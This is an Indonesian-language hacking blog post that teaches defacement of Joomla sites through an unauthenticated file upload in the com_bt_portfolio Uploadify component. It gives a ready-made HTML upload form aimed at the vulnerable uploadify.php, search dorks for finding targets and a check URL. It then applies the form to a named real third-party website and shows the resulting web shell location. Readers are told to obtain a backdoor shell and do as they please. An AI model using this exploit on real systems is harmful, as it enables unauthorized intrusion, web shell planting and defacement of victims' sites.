![[#] Cileungsi - Cyber [#]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1HOYbqs6aHW6qDZavfqnTwQQG5kiNm084lssR1JtBxAO96qp7au32gDDgxzSaN2u01Tetbo6zQEFULg5ucp4AmguJCKaA1qIqrCH7OVYrNkYLvtC_XuHeMGzgDTCEfyvOgNu54JEQfM/s1600/flamingtext__25040060229699109.png)
Holla ^-^ Kembali Lagi Dengan Saya Orang Tamfan wkwk ^^ Oke Langsung Saja Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~ Exp...
Holla ^-^
Kembali Lagi Dengan Saya Orang Tamfan wkwk ^^
Oke Langsung Saja Kali ini Saya Akan Membahas Cara Deface Dengan Exploit ~ Exploit Joomla Com_Bt_Portofolio - Uploadify ~
Bahan2 :
1. Siapkan Shell backd00r ~ Belum Punya ? Download di Google Bertebaran Dimana2 :))
2. Script CSRF :
<body>
<form action="http://www.TarGetMu.or.id/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php" method="post"
enctype="multipart/form-data"><input type="file"
name="Filedata"> <input
type="hidden"
name="folder" value="/administrator/components/com_bt_portfolio/"><input type="submit" value="OK">
</form>
</body>
Copy Paste Script CSRF di atas Ke Notepad ~ Save as .html ~
Yang Berwarna Ungu itu Diganti Dengan Target Kamu :)))
Sekarang Kita Cari Targetnya Dengan Dork Berikut :
" /templates/bt_foto " or " /templates/bt_metro "
Dork Bisa Di Kembangkan Biar Manjur dan Sesuai Selera :))
Exploit Vulnerability Check :
http://www.TargeTMu.co.li/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
Copy Target Kamu Ke Script CSRF Tadi ~ Contoh Target Saya :
http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php
Jadinya Seperti di Bawah ini :
<body>
<form action="http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php" method="post"
enctype="multipart/form-data"><input type="file"
name="Filedata"> <input
type="hidden"
name="folder" value="/administrator/components/com_bt_portfolio/"><input type="submit" value="OK">
</form>
</body>
Lihat Gambar Kalau ga Ngerti ~
Lalu Save as ~ buka File CSRF tadi Lewat Browser kamu ~ Lalu Upload Shell ~
Kalau Berhasil Nanti Akan Muncul Teks Dimana Letak Shell Kalian Berada Se[erti ini :))
Tinggal Di Panggil Deh si Shell Backd00r itu wkwkw :)))
Jadinya Seperti ini ~
http://www.arthand.kiev.ua/administrator/components/com_bt_portfolio/Leovarisa.php
Terus Di Apain Lagi Kalau Dah Kaya Gitu :p ?
Terserah Kalian wkwk Mau di Cipok ~ Atau Mau di Kasih ane Juga Boleh wkwk :p
Oke Semoga Bermanfaat dah ^o^
Postingan
COMMENTS